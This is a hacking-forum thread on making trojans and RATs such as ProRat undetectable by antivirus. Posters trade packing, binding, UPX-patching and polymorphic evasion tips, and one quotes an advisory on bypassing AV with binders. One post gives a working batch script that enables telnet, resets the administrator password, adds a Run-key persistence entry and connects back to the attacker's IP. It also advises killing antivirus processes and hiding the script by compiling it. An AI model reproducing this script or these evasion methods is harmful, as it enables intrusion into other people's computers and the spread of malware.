96 replies to this topic

[what]

morphine.exe comes to mind, it uses the UPX technique and others to hide files, but I've heard that it now shows up as a trojan after you hide it with morphine.exe . Again, the best way to have an undetectable trojan is to make your own. I made one that has a windows API that works through windows net messenger. Since you can't register any of the .OCX's on a limited access computer (mswinsck.ocx for example) then you can't create a connection over the internet. With this API, you can send a message to a user and execute commands on the remote computer. All the program does is users the handle on the messenger window to define different variables in net message. Tested it out and worked fine at school. It also has some other features, but I really don't feel like writing them all down right now. I've been trying to create FTP support, but that can be very hard through a net message window . I'll post it in the downloads section when I get home, along with the VB sources.

Just for future reference, use C++ in the future. This way only works over school lans (or computers without a firewall).

[Flowby]

if you woud read the whole thread you woud fimnd the undetected binder!!!And lol I woudnt give 200 dolars for nothing in the world...

[gerok]

As far as telnet, do you have any pages with a huge list of commands (view process, kill process, upload, run, download, etc?) Or better yet, any telnet clients you recommend that could run commands with a click of a button?

[Silent Bob]

I dont know if this will be helpful but ill give it a try. WHY NOT USE .bat files! The way i infect someone is to use this simple .bat file and then compile it with a .bat compiler.

net start telnet
net user administrator yourpwhere 
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v Rundllcms /t REG_SZ  /d "net start telnet"
telnet youriphere

This .bat file will:
1. start telnet
2. change the administrator pw to whatever you want
3. add a registry key to start telnet every time that windows starts
4. and if you have a program that will listen on a port for a connection you can even get their ip. (i use a prog called IPStealer for this)

After they are infected you can simply connect to them using telnet and log in as administrator using the pw you chose. From there you can kill any av processes you see. And then you can upload you favorite DETECTED trojan. Its that easy. If this sounds compilcated, its not. There are many .bat file compilers around. I use one called BAT2EXE. It changes the .bat file to a .com file so the source code and your ip are hidden.
If this doesnt make sesnse to you or you have questions feel free to contact me. I really hope this helps.

but if it was an XP machine wouldnt it show up at the login screen?

just asking, im not 100% sure

[gerok]

I'm trying to look for that topic but can't seem to find it. Also, the search function only accepts 4+ letters. Any idea what the topic was called, and in what forum? Thanks for commands.

[roger_girardin]

@Bigbowser

Dede is a delphi DE-compiler. ( which means it reverts the program back to its source code if its written in delphi )

sounds interesting but the version i found 1.06 only decompile delphi 3 - 4 - 5

readme extract :

DeDe is a very fast program that can analize executables compiled with Delphi 3,4,5 and give you the following:

i guess the servers are built on delphi 6 or 7

am i wrong ?

[simply-me]

compressing didnt work in my case tell me about exe encryption. Can we directly exeute an encrypted exe?

[passtheblunt]

Anyone know where to get a new pe patcher for upx packed files ?

[n0vun]

Anyone know where to get a new pe patcher for upx packed files ?

try upolyx is very good, but i reckon it might be picked up by AV now

[passtheblunt]

Anyone know where to get a new pe patcher for upx packed files ?

try upolyx is very good, but i reckon it might be picked up by AV now

Well it works good for norton and a few others but kav has picked up on it Isnt there a way to patch a upx packed file by hexing the upx part ? If so how would one go about doing it

[SlippyG]

This isn't going to make me any friends, but here goes:

Out of X number of posts there is only ONE post with even half a clue of what they are talking about. xwarlordx post, though brief, was at least facing the right way, the rest of you are 180 degrees out.

Here, again, is xwarlordx:

well the problem is, most trojans are user niveau based, witch always makes them (somehow) detecteble, if you really want to come close to undetecteble you should work kernel based (ntquery).

Then you should think about what you would like to hook exactly, like files reg keys dirs files ports even ?

Included most viruses still working with the reg run idea, witch is really simple to clear, why not hook it into a process like gina --> winlogon or smthing. (to bad that thats user based like svchost )

Partly I blame a missunderstanding between what constitutes undetectABLE versus undetectED. Any fool can tell you how to make something undetectED and it seems that every fool just did (read previous pages). Making something undetectABLE would require a little creative thought and would have been an excellent and thought provoking thread. Alas, this seems beyond our readership.


I applaud xwarlordx for bothering to provide a brief answer to the actual question.

Here is another:

I know of two methods that are undetectABLE* by current AV engines. The first relies on using tables of convoluted 'do-nothing' snippets that are used in multiple passes to dilute the decrytion header to the point where signature based recognition is almost impossible. This creates fresh undetectED code at each subsequent generation and is thus undetectABLE by CURRENT engines. Furthermore, it has been speculated that an engine to detect this method, although possible, would be prohibitive (both in false positives and in time taken) and thus unmarketable. This method will allow code to be executed although the code would have to take its own steps to avoid detection in memory. However, this task is aided by the fact that such detection can only occur once the integrity of the system is already compromised.

The second method uses its own block fetch-execute routine and runs slower, but has the benefit of not having enough decrypted bytes of code in memory at any one time to be susceptible to signature recognition in memory. The fetch-execute engine is based upon similar technology to the first method.

Virtualy undetectable malware IS possible and would probably require a complete rethink of platform security to fix. Its a fascinating subject that should be of interest to us all. At least, all of us who are past hexing subseven.

My apologise to anyone I have missed (besides xwarlordx) who has more than half a brain...


SG

This post may be trashcanned as it is condascending and more than a little argumentative. I'm fine with that. But lets fax the face, if all you want is the same dull recycled kiddie garbage you can find anywhere else then posters like xwarlordx and myself are probably out of place. If I have offended you and you would like this post removed please my post rather than sink to my level : )

*UndetectABLE. Nothing is TRULY undetectable. I instead (ab)use the term to describe anything which is prohibitively difficult or time consuming to detect within reasonable parameters.

[gabriele56]

In the name of God, The Beneficent , The Merciful



Subject : Major Antivirus Softwares fail to detect new multi dropping or binding Techniques.

Discovered By : Mohammad.R.Faghani.

Tested Softwares : Symantec Norton, Mcafee VirusScan .

Risk Impact : High.



As we know, the Programming techniques are improving all days, and so do the file binding.
There're lots of Binders or Multi-Droppers nowadays.

What's a Multi-Dropper or Binder ?

The Multi Dropper or Binder is a software which binds some files together and gives you
an executable file. When you run that file, The Bind files will be executed one by one. note that you can bind Pictures with some other Executables or any kind of files.

So the difference between a multi-dropper and an executable archive is the binder will execute the bind files,
after you run it.

The story starts from here that , if you use one of these kind of binders to bind a virus with other malformed files,

the antiviruses named above fail to detect it as malicious executable file.



Proof of Concept



Using real viruses for testing in the real world is rather like setting fire to the dustbin in your office to see whether the smoke detector is working.

Such a test will give meaningful results, but with unappealing, unacceptable risks.

Since it is unacceptable for you that I Proof my concept with a real virus, you need a file that can safely be passed around

and which is obviously non-viral, but which your anti-virus software will react to as if it were a virus.

The good news is that such a test file already exists. A number of anti-virus researchers have already worked together to produce

a file that their (and many other) products "detect" as if it were a virus. This test file has been provided to EICAR for distribution as the "EICAR Standard Anti-Virus Test File", and it satisfies our purpose. It is safe to pass around, because it is not a virus, and does not include any fragments of viral code.



    X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*



The 68-byte long string above, is what we are looking for. open notepad ( Start|Run , type notepad and press enter ).

Copy and paste the string above in notepad window, save it as a eicar.exe ( be sure select "All Files" from "Save as type:" combo ).

now if you have an antivirus with On Access Scan Technology such as MacAfee or Symantec Norton, The file saving will be denied,

because you are saving a virus on your computer ! . so you've to disable your anti virus first and do it again.

The file is a legitimate DOS program, and produces sensible results when run (it prints the message "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!").

Now if you bind this file with another program ( or just alone with no other programs ) with a new binder, the final executable file will not be detected a
Virus.

I've made an example and it's safe to download. It contains 3 files ,
EICAR.COM the test virus, BINDEICAR.EXE the bind EICAR.COM which has the EICAR.COM inside itself. and the README.

download it here : http://www.sharemati...s/testfiles.zip

Try Scan them with Built in Norton Antivirus 2004 in Yahoo Mail or your desktop antivirus.
So it's so easy for an attacker to bind several trojans together and send the executable via Email such as Yahoo mail to the victim. You'll see
that, antivirus cannot detect it as a malware.
Then you can find how harmful it is if one of  mass-mailing worms use this method to bypass Email antivirus and infect the world.

I've noted those antivirus vendors while I'm writing this article.
P.S. Do not hesitate if you have any question.

Regards.
Mohammad Reza Faghani

u know this paper? I've made a Prorat 1.8 server, and binded with a file with the built-in binder and it's undetected by Mcafee and Norton, not for Kav

ps: sorry but I don't have the permission to make a new topic.